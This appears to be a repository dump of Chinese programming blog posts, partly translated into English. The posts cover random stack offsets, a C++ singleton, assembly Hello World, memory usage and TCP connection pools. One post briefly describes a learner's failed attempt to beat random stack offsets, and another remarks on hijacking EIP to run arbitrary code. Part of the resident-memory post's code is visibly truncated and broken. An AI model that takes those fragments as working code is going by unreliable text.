    printf("%p\n", ret);

    free(buffer);

    return 0;
}
```
  No `fork` this time; call the `execl` family directly. The test fails again, for a simple reason: the `execl` functions replace the entire process context, stack included, and who knows what the new stack looks like. There will be a fresh random stack offset; otherwise this example would have succeeded.

### Wrap-up
  In summary, at my current level I can't defeat this randomized stack offset. There are ways, of course; your humble rookie blogger just doesn't know them yet. :-)

  **Good Luck, Have Fun!!!!!!!!**
--------------------------------------------------------------------------------
/c++-template-singleton.md:
--------------------------------------------------------------------------------
Simple C++ Template Singleton Class
===================================

## Origins
  Back in the pure-C era, referencing a global variable meant `extern`; but once such globals multiply, writing code means hunting all over the place for where each one is defined. In C, every member of a `struct` is public by default, so there is no singleton concept. In the dual C/C++ era the answer to `extern` is the singleton, but implementing every class as a singleton by hand is tedious, and a class hard-wired as a singleton is too restrictive when you sometimes want singleton semantics and sometimes don't. Hence this simple class template.

## Note
  Why "Simple"? Because this example is not thread-safe, and making a singleton truly thread-safe with good performance is far more than just adding a lock; compiler optimizations come into play too. For the details, see the DCLP (Double-Checked Locking Pattern) paper [here](http://www.aristeia.com/Papers/DDJ_Jul_Aug_2004_revised.pdf).

## Source
[class_templates.h](https://github.com/linghuazaii/C--Templates/blob/master/classes/class_templates.h)
```c++
#ifndef _CLASS_TEMPLATES_H
#define _CLASS_TEMPLATES_H
/*
 * File: class_templates.h
 * Author: Charles, Liu.
 */
#include <cstddef> /* NULL */

template <typename T>
class Singleton {
public:
    static T *instance();
    static void destroy();
private:
    Singleton();
    ~Singleton();
private:
    static T *_instance;
};

template <typename T>
T *Singleton<T>::_instance = NULL;

template <typename T>
T *Singleton<T>::instance() {
    if (_instance == NULL) {
        _instance = new T;
    }

    return _instance;
}

template <typename T>
void Singleton<T>::destroy() {
    if (_instance != NULL) {
        delete _instance;
        _instance = NULL; /* avoid double delete on repeated calls */
    }
}

template <typename T>
Singleton<T>::Singleton() {
}

template <typename T>
Singleton<T>::~Singleton() {
}

#endif
```
[myclass.h](https://github.com/linghuazaii/C--Templates/blob/master/classes/myclass.h)
```c++
#ifndef _MY_CLASS_H
#define _MY_CLASS_H
/*
 * File: myclass.h
 * Author: Charles, Liu.
 */
#include <iostream>
using namespace std;

class MyClass {
public:
    MyClass(){}
    ~MyClass(){}
    const char *print() {
        return "calling MyClass::print";
    }
};

#endif
```
[main.cpp](https://github.com/linghuazaii/C--Templates/blob/master/classes/main.cpp)
```c++
#include <iostream>
#include "class_templates.h"
#include "myclass.h"
using namespace std;
/*
 * For TESTING, have fun!!!
 */

const char *test_info = NULL;

#define INFO(msg) do { \
    test_info = msg; \
    cout << "============== " << test_info << " ==============" << endl; \
} while (0)
#define END() cout << "============== "<< "END" << " ==============" << endl
#define TEST2(function, a, b) do {\
    INFO("TEST "#function);\
    cout << #function << "(" << a << "," << b << ")" << " = " << function(a, b) << endl;\
    END();\
} while (0)
#define TEST(function) do {\
    INFO("TEST "#function);\
    cout << #function << "() = " << function() << endl;\
    END();\
} while (0)

int main(int argc, char **argv) {
    MyClass *single_test = Singleton<MyClass>::instance();
    TEST(single_test->print);

    MyClass *addr1 = Singleton<MyClass>::instance();
    MyClass *addr2 = Singleton<MyClass>::instance();
    cout << "addr1: " << static_cast<void *>(addr1) << endl;
    cout << "addr2: " << static_cast<void *>(addr2) << endl;
    Singleton<MyClass>::destroy();

    return 0;
}
```
--------------------------------------------------------------------------------
/c-hello-world.md:
--------------------------------------------------------------------------------
[新手乐园] Learning C with Me - Hello World
==================================
  Let me explain the pieces one by one; further down I'll go straight to an x86-64 assembly version of Hello World. Today's memory model is long past the real-address model of the ancient DOS era: with virtual memory, every program first gets a 4 GB sandbox to play in, the segment addresses held in registers are all offsets, and the CPU computes the real addresses for us. Moreover, a program's starting offset isn't 0x00000000 but 0x400000; the memory below that holds some standard-library bookkeeping we don't need to care about. A program is made of segments: a data segment, a text segment, a bss segment, and so on. The various SS, DS, CS, ES, FS, GS registers each hold a segment start, while SP, DI, SI can hold an offset, so that, as in the figure, DS:SI points at one concrete address. For now I only want to impress one thing on you: addresses matter enormously; they are the heart of a running program!

### Those goofy registers
  `eax`, `ebx`, `ecx`, `edx` are the general-purpose registers, 32 bits wide; drop the `e` and, for example, `ax` is the 16-bit form, with `ah` and `al` its high and low bytes. `esi`, `edi`, `esp`, `ebp` have no 8-bit forms; how they're used is up to the CPU's conventions. CS is the Code Segment, DS the Data Segment, SS the Stack Segment; ES, FS, GS are for extension, because there may be more than one segment and a single instruction may need data from several segments. EFLAGS stores CPU status, overflow and the like. Then there's the classic EIP/RIP, and this lady is formidable: she holds the address of the next instruction. (Congratulations, by the way, to the 360 security team on winning this year's Pwn2Own.) If you can find a bug in a program, and that bug can be used to take control of EIP/RIP, you can execute arbitrary code and rewrite the program's logic at will; find such a bug in a famous vendor's product and congratulations, that's a 0-day, go sell it, buying an apartment is no longer a dream~ That's registers for you. I know it hasn't all clicked yet; no matter, let's grab the keyboard and get to work~

### The x86-64 version of Hello World
```
; This file is auto-generated. Edit it at your own peril.
section .data
    msg: db "Hello World!",10
    msglen: equ $-msg

section .text

global _start
_start:
    nop ; make gdb happy
    ; put your experiments between these nop
    mov eax,1
    mov edi,1
    mov esi,msg
    mov edx,msglen
    syscall
    ; put your experiments between these nop
    nop ; make gdb happy

    ; exit
    mov eax,60   ; system call 60: exit
    xor edi, edi ; set exit status to zero
    syscall      ; call the operating system

section .bss
```
  A monk tells no lies, so look: the `.data` section stores a variable `msg` plus `msglen`, i.e. initialized globals, the so-called static storage area; the `.text` section holds the code; and `_start` is the program's entry address. You'll find a `_start` symbol in a C program's symbol table too.
49 |    50 |
51 |   这里我就直接上指令了,`mov eax, 1`表示我们要调用`sys_write`,`mov edi,1`表示我们要写描述符1,即`stdout`,`mov esi,msg`表示传入要写内容的地址,`mov edx,msglen`表示传入消息长度,然后`syscall`中断,让操作系统干事去。你仔细看,其实这段汇编完全遵循着intel x86的指令集表,是不是?你现在再把前面指令集啊,寄存器啊啥的联系起来想一想,程序其实就是这么回事儿。然后后面就是调用退出指令:
52 |    53 |
54 |   我没骗你吧,遵循着那张指令集表呢。如果你翻过Linux内核源码你就会发现很多`_sys`打头的函数,看看那堆乱七八糟的宏定义~ 55 |
56 |   `nasm -f elf64 -g -F stabs test.asm -o test.o`,然后`ld test.o -o test`。让我们调试一下:`gdb -tui test` 57 |
58 |    59 |
60 |   操作细节我就不写了,你自己慢慢玩嘛,看看寄存器的变化啥的。然后我们看看symbol table,`readelf -s test`
61 | ``` 62 | Symbol table '.symtab' contains 12 entries: 63 | Num: Value Size Type Bind Vis Ndx Name 64 | 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 65 | 1: 00000000004000b0 0 SECTION LOCAL DEFAULT 1 66 | 2: 00000000006000d4 0 SECTION LOCAL DEFAULT 2 67 | 3: 0000000000000000 0 SECTION LOCAL DEFAULT 3 68 | 4: 0000000000000000 0 SECTION LOCAL DEFAULT 4 69 | 5: 0000000000000000 0 FILE LOCAL DEFAULT ABS 002.asm 70 | 6: 00000000006000d4 1 OBJECT LOCAL DEFAULT 2 msg 71 | 7: 000000000000000d 0 NOTYPE LOCAL DEFAULT ABS msglen 72 | 8: 00000000004000b0 0 NOTYPE GLOBAL DEFAULT 1 _start 73 | 9: 00000000006000e1 0 NOTYPE GLOBAL DEFAULT 2 __bss_start 74 | 10: 00000000006000e1 0 NOTYPE GLOBAL DEFAULT 2 _edata 75 | 11: 00000000006000e8 0 NOTYPE GLOBAL DEFAULT 2 _end 76 | ``` 77 |
78 |   然后我们再反编译一下对比一下,`objdump -S --disassemble test`
79 |    80 |
81 |   和汇编版本差别不大是不是,但是对于C来说可就大了去了~ 82 |
83 | 84 | ### C语言版本Hello World 85 | 86 | ```c 87 | #include <stdio.h> 88 | int main(int argc, char **argv) { 89 | printf("Hello World!"); 90 | 91 | return 0; 92 | } 93 | ``` 94 |
95 |   C语言版本够简单吧,才这几行~ 我们看看符号表,`readelf -s a.out` 96 |
97 |    98 |
99 |   这符号表是不是复杂多了,但是`_start`入口还是一样会有,当然也少不了`main`啦,让我们调试一下`gdb -tui a.out`
100 |    101 |
102 |   从`_start`开始会调到`__libc_start_main@plt`,关于plt我这里要唠叨两句,如果你写过插件化的架构或者其他的东西肯定会用到`dlopen`,这又要扯到什么链接装载与库,什么乱七八糟的东西,我不想扯。链接器将一堆.o链接成一个可执行文件的时候就是找符号,没有的就向后找,凡是使用到的都去找,第一个找到的扔进plt表,如果一个都找不到那么就出现`Undefined Reference`错误。看上边的符号表里也有`__libc_start_main`,对吧,联系起来了吧。然后我们继续调试会发现函数调用次序是这样的`printf@plt` => `vfprintf` => `strchrnul`,反正具体什么玩意我也不是很懂,毕竟我也是个Newbie。到这里呢,如果你也是跟着我一起gdb了,你会发现,一切都是地址,地址指向代码段,数据段,然后整到寄存器里,然后送到CPU,CPU把一切都搞定了,程序就跑起来啦。 103 |
104 |   让我们反编译一下a.out看看是些什么鬼东西吧~ `objdump -S --disassemble a.out`,汇编指令我就省略掉大部分 105 |
106 |    107 |   你发现了吗,符号表里的symbol对应着段,段对应着一个起始地址,起始地址之后是一段汇编代码,一切的一切在这里都联系起来了吧,一切的一切都是地址,给我地址我就能拿到所有能拿到的东西。 108 | 109 | ### 小结 110 |   小结个屁,这都晚上12:30了,看了这么久,给你们出个简单的小题目,看你们看懂了没:
111 |   我现在有两个库a.so和b.so,两个库里面都有一个print 函数,a.so里输出A,b.so里输出B,然后我有一个主程序文件main.c,
112 |   如果我`gcc -L. main.c -o test -la -lb`,运行程序输出啥?
113 |   如果我`gcc -L. main.c -o test -lb -la`,运行程序输出啥?
114 |   欢迎评论,就算你评论了,我也不会理你的~
115 |   **GLHF~** 116 | -------------------------------------------------------------------------------- /decrease-resident-memory.md: -------------------------------------------------------------------------------- 1 | ## 问题描述 2 |   新闻推荐`server`内存占用率过高,每个新闻`item`占用内存54K,为了避免造成过多内存碎片和提升性能,使用了内存池。该内存池结构:一个链表连接每个`block`,每个`block`初始为1000个`item`,即每个`block`占用54M内存。然后从数据库load数据,大概生成60000个`item`,也就是大约3G的内存,然后两个内存池,用来做reload数据并指针置换,这样占用内存达6G。内存池使用`calloc`申请内存,底层调用`mmap`,费用有些高,所以一次尽量多申请些内存。为什么用`calloc`,而不用`malloc + memset`,因为后者必然会占用6G内存,`calloc`首先避免了重复的`memset`调用,其次也优化了内存申请逻辑,即申请3G内存,其实并没有真实的占有3G内存,只是拿到了系统发的保证书,意思就是要的时候再给你。其实就是,写内存的时候才会触发`PAGE FAULT`,进而触发`PAGE SWAP`,申请真实的RAM。那么问题出现了,内存池使用的是`calloc`,理论上根本不会占用6G内存,为什么呢?(以上所说内存都是指`top`显示的`RES`内存,即resident memory,不是virtual memory,不知道两者区别可以先去做做功课) 3 | 4 | ## 看以下例子并回答我的问题 5 | 6 | ### struct article_item 7 | ``` 8 | #define MAX_CONTENT_LEN 51200 9 | 10 | #pragma pack(1) /* 不推荐1字节对齐,这样会损耗性能,正确写法应该是把按宽度降序排列 */ 11 | typedef struct article_item{ 12 | uint32_t create_time; 13 | uint32_t modify_time; 14 | uint32_t public_time; 15 | uint64_t source_id; 16 | uint64_t item_id; 17 | uint64_t group_id; 18 | uint16_t type; 19 | uint16_t duration; 20 | char video[512]; 21 | char original_video[512]; 22 | char original_thumbnails[512]; 23 | char category[32]; 24 | char data_type[32]; 25 | char url_source[32]; 26 | char source[32]; 27 | char title[256]; 28 | char content[MAX_CONTENT_LEN]; 29 | char url[512]; 30 | char thumbnails[512]; 31 | char url_target[512]; 32 | char extra[1024]; 33 | } article_item; 34 | #pragma pack() 35 | ``` 36 | 笔者推荐结构体写法: 37 | ``` 38 | #define MAX_CONTENT_LEN 51200 39 | 40 | typedef struct article_item{ 41 | uint64_t source_id; 42 | uint64_t item_id; 43 | uint64_t group_id; 44 | uint32_t create_time; 45 | uint32_t modify_time; 46 | uint32_t public_time; 47 | uint16_t type; 48 | uint16_t duration; 49 | char video[512]; 50 | char original_video[512]; 51 | char original_thumbnails[512]; 52 | char category[32]; 53 | char 
data_type[32]; 54 | char url_source[32]; 55 | char source[32]; 56 | char title[256]; 57 | char content[MAX_CONTENT_LEN]; 58 | char url[512]; 59 | char thumbnails[512]; 60 | char url_target[512]; 61 | char extra[1024]; 62 | } article_item; 63 | ``` 64 | 65 | ### Version A 66 | ``` 67 | int main(int argc, char **argv) { 68 | cout<= n) { 123 | memmove(dest, src, n); 124 | } else { 125 | memmove(dest, src, strlen(src)); 126 | dest[strlen(src)] = 0; 127 | } 128 | 129 | return dest; 130 | } 131 | ``` 132 | 133 | ## 结语 134 | 好想进BAT…… 135 | -------------------------------------------------------------------------------- /how-to-write-a-self-repair-tcp-pool.md: -------------------------------------------------------------------------------- 1 | 怎样写一个自修复的TCP连接池 2 | =========================== 3 | 4 | ### 原料 5 |   epoll, threadpool, pthread 6 | 7 | ### 构图 8 |   首先,我们怎么定义一个socket连接?其一当然是socket file descriptor;其二就是关于socket的一些设置选项,像`TCP_NODELAY`, `TCP_CORK`, `SOCK_NONBLOCK`, `TCP_KEEPALIVE`等等;其三,socket可能由于server crash或者一段时间闲置被server close,或者其他原因导致其失效,所以需要一个选项保存socket的状态;其四,这个socket是所有线程共享的,这里的共享是指socket被某一个thread里拿出来,可能因为失效,另一个做修复的thread正在修复这个socket连接。由于在连接失效时才修复连接并更改连接是否可用的选项,而且每次从池子拿连接都得判断连接是否可用,所以需要一把读写锁,因为写得少读的多嘛;其五,设置一个额外的字段留着备用。结构如下: 9 | ```c 10 | typedef struct tcp_connection_t { 11 | int fd; 12 | int flags; 13 | bool valid; 14 | pthread_rwlock_t rwlock; 15 | void *extra; 16 | } tcp_connection_t; 17 | ``` 18 |   其次,一个连接池需要哪些东西呢?其一,需要一个大池子`vector pool`存储所有的连接信息;其二,需要一个队列存储可用的连接`queue ready_pool`;其三,这些池子是共享的,所以需要一把锁,一个条件变量去检测池子里是否有连接可用;其四,池子对外接口只需要`initPool()`, `getConnection()`, `putConnection()`;其五,需要一些额外的信息保存server信息以及池子信息。类声明如下: 19 | ```c 20 | class CharlesTcpPool { 21 | public: 22 | CharlesTcpPool(const char *ip, int port, int max_size = MAX_POOL_SIZE, int init_size = INIT_POOL_SIZE); 23 | ~CharlesTcpPool(); 24 | int initPool(int flags = CHARLES_OPTION_NONE); 25 | tcp_connection_t * newConnection(int flags = CHARLES_OPTION_NONE); 26 | /* flags is for newConnection when 
ready pool is empty but pool is not full */ 27 | tcp_connection_t * getConnection(int timeout /* milisecond */, int flags = CHARLES_OPTION_NONE); 28 | void putConnection(tcp_connection_t *connection); 29 | int setConfig(int sock, int flags); 30 | public: 31 | void watchPool(); 32 | void repairConnection(tcp_connection_t *connection); 33 | private: 34 | pthread_mutex_t mutex; 35 | pthread_cond_t cond; 36 | int max_pool_size; 37 | int init_pool_size; 38 | vector pool; 39 | queue ready_pool; 40 | threadpool_t *threadpool; 41 | int epollfd; 42 | char ip[IPLEN]; 43 | int port; 44 | bool running; 45 | }; 46 | ``` 47 |   然后,连接失效了我们怎么修呢?这里就需要用到`epoll`了,所有新建立的连接需要加到`epoll`里监控,只需要监控`EPOLLIN`,这里我们只能选择LT模式,因为ET模式只通知一次,为了避免数据丢失,只能选择LT模式。只要有`EPOLLIN`事件产生,就用`ioctl(fd, FIONREAD, &length)`检查一下socket可读的buffer大小,如果为`0`则表示server关闭了连接,需要我们修复。你可能会问:那buffer里有内容我一直没读怎么办?没关系,没读是你的事,等你读完了,对于该socket会一直有`EPOLLIN`事件产生,这里检查可读buffer大小依旧为`0`,此时连接才被判定为失效。一般server挂掉之后起来得花些时间,所以每一次重建连接失败的话会有一个等待延时,而且有一个重试次数,如果耗尽的话就等待下一次`epoll_wait`返回再试。这里其实可以稍微设计一下算法的,比如说每一次重建连接失败都会略微增加延时。其实也没有太大的必要,因为有延时后就减少了很大一部分CPU消耗了,可以忽略不计。 48 | 49 | ### 实现 50 |  初始化该初始化的东西。 51 | ```c 52 | CharlesTcpPool::CharlesTcpPool(const char *server_ip, int server_port, int max_size, int init_size) { 53 | strncpy(ip, server_ip, IPLEN); 54 | port = server_port; 55 | max_pool_size = max_size; 56 | init_pool_size = init_size; 57 | pthread_mutex_init(&mutex, NULL); 58 | pthread_cond_init(&cond, NULL); 59 | pool.reserve(max_size); 60 | } 61 | ``` 62 | 63 |  析构的时候还是加上锁吧,不然不知道会不会出什么幺蛾子。 64 | ```c 65 | CharlesTcpPool::~CharlesTcpPool() { 66 | // do clean 67 | pthread_mutex_lock(&mutex); 68 | for (int i = 0; i < pool.size(); ++i) { 69 | tcp_connection_t *connection = pool[i]; 70 | pthread_rwlock_wrlock(&connection->rwlock); 71 | charles_epoll_ctl(epollfd, EPOLL_CTL_DEL, connection->fd, NULL); 72 | close(connection->fd); 73 | connection->valid = false; 74 | pthread_rwlock_unlock(&connection->rwlock); 75 | 
pthread_rwlock_destroy(&connection->rwlock); 76 | delete connection; 77 | } 78 | running = false; 79 | ready_pool = queue(); 80 | pthread_mutex_unlock(&mutex); 81 | pthread_mutex_destroy(&mutex); 82 | pthread_cond_destroy(&cond); 83 | } 84 | ``` 85 | 86 |  `initPool()`实现,主要是新建一堆连接,启动后台的连接监测线程,还有连接修复线程池。 87 | ```c 88 | int CharlesTcpPool::initPool(int flags) { 89 | epollfd = charles_epoll_create(); 90 | if (epollfd == -1) 91 | return -1; 92 | threadpool = threadpool_create(THREADPOOL_SIZE, THREADPOOL_QUEUE_SIZE, 0); 93 | if (threadpool == NULL) 94 | return -1; 95 | 96 | for (int i = 0; i < init_pool_size; ++i) { 97 | tcp_connection_t *connection = newConnection(flags); 98 | if (connection == NULL) /* fail if can't create connection */ 99 | return -1; 100 | pool.push_back(connection); 101 | ready_pool.push(connection); 102 | } 103 | 104 | pthread_t watcher; 105 | pthread_attr_t watcher_attr; 106 | pthread_attr_init(&watcher_attr); 107 | pthread_attr_setdetachstate(&watcher_attr, PTHREAD_CREATE_DETACHED); 108 | pthread_create(&watcher, &watcher_attr, watch_pool, (void *)this); 109 | pthread_attr_destroy(&watcher_attr); 110 | 111 | return 0; 112 | } 113 | ``` 114 | 115 |  新建连接实现。 116 | ```c 117 | tcp_connection_t * CharlesTcpPool::newConnection(int flags) { 118 | tcp_connection_t *connection = new tcp_connection_t; 119 | connection->fd = charles_socket(AF_INET, SOCK_STREAM, 0); 120 | connection->flags = flags; 121 | connection->valid = true; 122 | connection->extra = (void *)this; 123 | pthread_rwlock_init(&connection->rwlock, NULL); 124 | struct sockaddr_in server; 125 | server.sin_family = AF_INET; 126 | server.sin_port = htons(port); 127 | charles_inet_aton(ip, &server.sin_addr); 128 | if (-1 == setConfig(connection->fd, flags)) { 129 | close(connection->fd); 130 | delete connection; 131 | return NULL; 132 | } 133 | if (-1 == charles_connect(connection->fd, (struct sockaddr *)&server, sizeof(server))) { 134 | close(connection->fd); 135 | delete connection; 136 | 
return NULL; 137 | } 138 | 139 | return connection; 140 | } 141 | ``` 142 | 143 |  `watch_pool`实现,就是为了回调进类里去。 144 | ```c 145 | /* call back into class */ 146 | void *watch_pool(void *arg) { 147 | CharlesTcpPool *pool = (CharlesTcpPool *)arg; 148 | pool->watchPool(); 149 | } 150 | ``` 151 | 152 |  `watchPool()`后台监测连接线程函数实现。这里为了安全起见还是先上个锁,因为本线程启动之前可能有其他线程已经在使用池子了。所有初始的连接都加入到`epoll`里去监听,如果收到`EPOLLIN`事件并且可读buffer大小为`0`,则先将其从`epoll`监听里拿掉,送到连接修复线程池里去修复。 153 | ```c 154 | void CharlesTcpPool::watchPool() { 155 | pthread_mutex_lock(&mutex); 156 | for (int i = 0; i < init_pool_size; ++i) { 157 | struct epoll_event event; 158 | event.events = EPOLLIN; 159 | event.data.ptr = (void *)pool[i]; 160 | charles_epoll_ctl(epollfd, EPOLL_CTL_ADD, pool[i]->fd, &event); 161 | } 162 | pthread_mutex_unlock(&mutex); 163 | running = true; 164 | struct epoll_event events[max_pool_size]; 165 | while (running) { 166 | int nfds = charles_epoll_wait(epollfd, events, max_pool_size); 167 | if (nfds == -1) 168 | continue; 169 | tcp_connection_t *connection; 170 | for (int i = 0; i < nfds; ++i) { 171 | connection = (tcp_connection_t *)events[i].data.ptr; 172 | if (events[i].events & EPOLLIN) { 173 | if (0 == get_socket_read_buffer_length(connection->fd)) { 174 | pthread_rwlock_wrlock(&connection->rwlock); 175 | connection->valid = false; 176 | pthread_rwlock_unlock(&connection->rwlock); 177 | /* remove from epoll event */ 178 | charles_epoll_ctl(epollfd, EPOLL_CTL_DEL, connection->fd, NULL); 179 | threadpool_add(threadpool, repair_connection, (void *)connection, 0); 180 | } 181 | } 182 | } 183 | } 184 | } 185 | ``` 186 | 187 |  `repair_connection()`连接修复函数实现,就是为了回调进类里面去。 188 | ```c 189 | /* call back into class */ 190 | void repair_connection(void *arg) { 191 | tcp_connection_t *connection = (tcp_connection_t *)arg; 192 | CharlesTcpPool *pool = (CharlesTcpPool *)connection->extra; 193 | pool->repairConnection(connection); 194 | } 195 | ``` 196 | 197 |  
`repairConnection()`实现,先备份下失效连接的`fd`,因为后续可能需要将其再次加入到`epoll`监听,避免将其意外关闭导致永久丢失该连接的监听。如果成功建立连接则将连接状态置为有效并关闭备份连接,完了无论是否成功建立连接,都需要将该连接重新加入到`epoll`监听等待下一次`epoll_wait`返回。 198 | ```c 199 | void CharlesTcpPool::repairConnection(tcp_connection_t *connection) { 200 | /* I must backup this fd, can't close it, it must remains a valid file descriptor */ 201 | int backup = connection->fd; 202 | int count = 0; 203 | for (; count < RETRY_COUNT; ++count) { 204 | connection->fd = charles_socket(AF_INET, SOCK_STREAM, 0); 205 | struct sockaddr_in server; 206 | server.sin_family = AF_INET; 207 | server.sin_port = htons(port); 208 | charles_inet_aton(ip, &server.sin_addr); 209 | if (-1 == setConfig(connection->fd, connection->flags)) { 210 | close(connection->fd); 211 | usleep(RETRY_PERIOD * 1000); 212 | continue; 213 | } 214 | if (-1 == charles_connect(connection->fd, (struct sockaddr *)&server, sizeof(server))) { 215 | close(connection->fd); 216 | usleep(RETRY_PERIOD * 1000); 217 | continue; 218 | } 219 | /* get a good connection */ 220 | pthread_rwlock_wrlock(&connection->rwlock); 221 | connection->valid = true; 222 | close(backup); /* close backup if we new connection successfully */ 223 | pthread_rwlock_unlock(&connection->rwlock); 224 | break; 225 | } 226 | /* add to epoll event even if this connection is not repaired, wait for next time repair */ 227 | struct epoll_event event; 228 | event.events = EPOLLIN; 229 | if (count == RETRY_COUNT) { /* failed, add original fd to epoll events */ 230 | connection->fd = backup; 231 | } 232 | event.data.ptr = connection; 233 | charles_epoll_ctl(epollfd, EPOLL_CTL_ADD, connection->fd, &event); 234 | } 235 | ``` 236 | 237 |  
逻辑最复杂的`getConnection()`实现,先记录一个`start_time`,如果可用的池子空了并且连接池已满,那么就等待连接可用直到`timeout`。否则,如果可用池子空了但是连接池未满,则新建一个连接返回并将其加入到连接池,但是并不加入到可用连接池,因为用完后会还给可用连接池。如果可用连接池不为空,则循环最多`max_pool_size`次数从可用连接池里拿连接直到`timeout`或者所有连接都不可用。这里为什么用`max_pool_size`而不是`ready_pool.size()`,因为不仅`ready_pool.size()`是动态可变的,而且新建的连接和失效的连接可能是穿插的,有点绕,好好想一下。`max_pool_size`确保了所有连接都过了一遍,即使有的连接被过了多次也无所谓,因为连接池不会非常巨大,所以暂不考虑算法层面上的优化。注意`pthread_cond_timedwait`要的是一个基于`CLOCK_REALTIME`的绝对deadline,而不是相对的等待时长,所以要先取当前时间再加上`timeout`。 238 | ```c 239 | tcp_connection_t *CharlesTcpPool::getConnection(int timeout /* millisecond */, int flags) { 240 | struct timespec ts; clock_gettime(CLOCK_REALTIME, &ts); /* absolute deadline for pthread_cond_timedwait */ 241 | ts.tv_sec += timeout / 1000; ts.tv_nsec += (timeout % 1000) * 1000000; 242 | if (ts.tv_nsec >= 1000000000) { ts.tv_sec += 1; ts.tv_nsec -= 1000000000; } 243 | struct timespec start_time, end_time; 244 | clock_gettime(CLOCK_MONOTONIC_COARSE, &start_time); 245 | pthread_mutex_lock(&mutex); 246 | while (ready_pool.empty() && pool.size() == max_pool_size) { 247 | int ret = pthread_cond_timedwait(&cond, &mutex, &ts); 248 | if (ret == ETIMEDOUT) { 249 | pthread_mutex_unlock(&mutex); 250 | return NULL; 251 | } 252 | } 253 | if (ready_pool.empty()) { 254 | tcp_connection_t *connection = newConnection(flags); 255 | if (connection == NULL) { 256 | pthread_mutex_unlock(&mutex); 257 | return NULL; 258 | } 259 | pool.push_back(connection); 260 | pthread_mutex_unlock(&mutex); 261 | return connection; 262 | } else { 263 | for (int count = 0; count < max_pool_size; ++count) { 264 | tcp_connection_t *connection = ready_pool.front(); 265 | ready_pool.pop(); 266 | bool valid; 267 | pthread_rwlock_rdlock(&connection->rwlock); 268 | valid = connection->valid; 269 | pthread_rwlock_unlock(&connection->rwlock); 270 | if (valid == false) { 271 | ready_pool.push(connection); 272 | clock_gettime(CLOCK_MONOTONIC_COARSE, &end_time); 273 | int period = (end_time.tv_sec * 1000 + end_time.tv_nsec / 1000000) - (start_time.tv_sec * 1000 + start_time.tv_nsec / 1000000); 274 | if (period >= timeout) { 275 | pthread_mutex_unlock(&mutex); 276 | return NULL; 277 | } 278 | } else { 279 | pthread_mutex_unlock(&mutex); 280 | return connection; 281 | } 282 | } 283 
| /* at last, all connection is failed */ 284 | pthread_mutex_unlock(&mutex); 285 | return NULL; 286 | } 287 | } 288 | ``` 289 | 290 |  `putConnection()`实现,还给池子,broadcast给所有线程,池子里有可用连接啦。 291 | ```c 292 | void CharlesTcpPool::putConnection(tcp_connection_t *connection) { 293 | pthread_mutex_lock(&mutex); 294 | ready_pool.push(connection); 295 | pthread_cond_broadcast(&cond); 296 | pthread_mutex_unlock(&mutex); 297 | } 298 | ``` 299 | 300 |   还有一些其他函数即细节没有一一罗列,所有代码请见[Charles TCP Pool](https://github.com/linghuazaii/Charles-TcpPool) 301 | 302 | ### 小结 303 |   **GOOD LUCK, HAVE FUN!** 304 | -------------------------------------------------------------------------------- /how-to-write-a-tcp-server.md: -------------------------------------------------------------------------------- 1 | 怎么从无到有写一个好的TCP Server 2 | ================================ 3 | 4 | ### 前言 5 |   很久以前在看Libevent的源码,然后研究怎么写一个完整的高性能的TCP Server,之后由于兴之所至研究Collective Intelligence然后搁置了很长一段时间,这两天就写了一个简易的,单机QPS绝对不会低,感兴趣希望帮忙测一下。 6 | 7 | ### TCP参数以及EPOLLET 8 |   为什么用Nonblocking和EPOLLET?原因之一是减少`epoll_wait`调用次数,这样也就减少了系统调用的次数,这样socket上的事件只会通知一次。对于listen socket,需要一直`accept`直到`errno`变为`EAGAIN`;对于连接socket,也需要一直`read`直到`errno`变为`EAGAIN`,这样就避免了数据的丢失。还有一点就是,可以多个thread同时`epoll_wait`同一个`epoll fd`,由于是ET模式,所有事件只会通知一次,所以不会引起spurious wakeup,这样可以利用multi-core来提升整体性能,本例中并没有实现这一点。 9 |   通过启用`TCP_NODELAY`来禁用Nagel算法,TCP默认是启用了Nagel算法的,对于需要快速响应的Server来说,禁用Nagel总是好的。还有一点就是TCP默认有一个ACK捎带的模式,即ACK并不是立即返回给另一方,可能会随着数据的返回而捎带过去,这样和Nagel一起使用会造成更长的延时,所以禁用Nagel就好。启用`TCP_DEFER_ACCEPT`,启用此选项的考虑点非常简单,当连接建立的时候,我们并不以为连接已经建立,而是当收到数据的时候才认为连接已经建立,这样对于不发数据但是建立了连接的client,不会加入到epoll监听,节省系统资源。同时,调用`accept`后,新加入监听的连接也会立刻产生EPOLLIN事件,因为buffer里已经有数据可读。 10 | 11 | ### 关于协议设计 12 |   起初我是打算将buffer这一层单独抽离出来做一层,基于此的考虑是TCP只是提供一个连续不断的流,而且TCP是全双工的。无论是业务还是Write都不可以打断我的Read。这样上层只需要做一个thread不断去buffer这一层切割完整的packet,做业务处理和Write就行,这样设计比较自然,但是越想越复杂就换了比较通用的`length|data`的设计。`length|data`的设计需要client遵守这个约定,要么将`length|data`封装成结构体,一次性Write,要么将使用`TCP_CORK`一次发送整个物理包,要么使用scatter/gather 
IO,即`readv/writev`。 13 | 14 | ### 线程池设计 15 |   如果将Server的行为拆分开来,大致可以分为5个:新建连接 => 读 => 请求处理 => 写,其间可以穿插错误处理。为了不让某个行为阻断另一个行为,举个例子,如果我建立了大小为8的线程池同时处理这五种行为,我请求处理的可能很慢,这样所有任务都会Hang死在请求处理这,所以为了避免处理速度不一致的情况将其拆分成五个线程池,这样也可以根据各个行为的耗时情况调整线程池的大小。 16 | 17 | ### 代码片段 18 | 五个线程池 19 | ```c 20 | read_threadpool = threadpool_create(8, MAX_EVENTS, 0); 21 | write_threadpool = threadpool_create(8, MAX_EVENTS, 0); 22 | listener_threadpool = threadpool_create(1, MAX_EVENTS, 0); 23 | error_threadpool = threadpool_create(2, MAX_EVENTS, 0); 24 | worker_threadpool = threadpool_create(8, MAX_EVENTS * 2, 0); 25 | ``` 26 | 27 | 对socket的简单封装,listen socket设置成NONBLOCK符合ET的设计。 28 | ```c 29 | int ss_socket() { 30 | int sock = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); 31 | if (sock == -1) 32 | abort("create socket error"); 33 | 34 | struct sockaddr_in serv_addr; 35 | memset(&serv_addr, 0, sizeof(serv_addr)); 36 | serv_addr.sin_family = AF_INET; 37 | serv_addr.sin_port = htons(PORT); 38 | serv_addr.sin_addr.s_addr = INADDR_ANY; 39 | 40 | set_reuseaddr(sock); 41 | set_tcp_defer_accept(sock); 42 | 43 | int ret = bind(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)); 44 | if (ret == -1) 45 | abort("bind socket error"); 46 | 47 | ret = 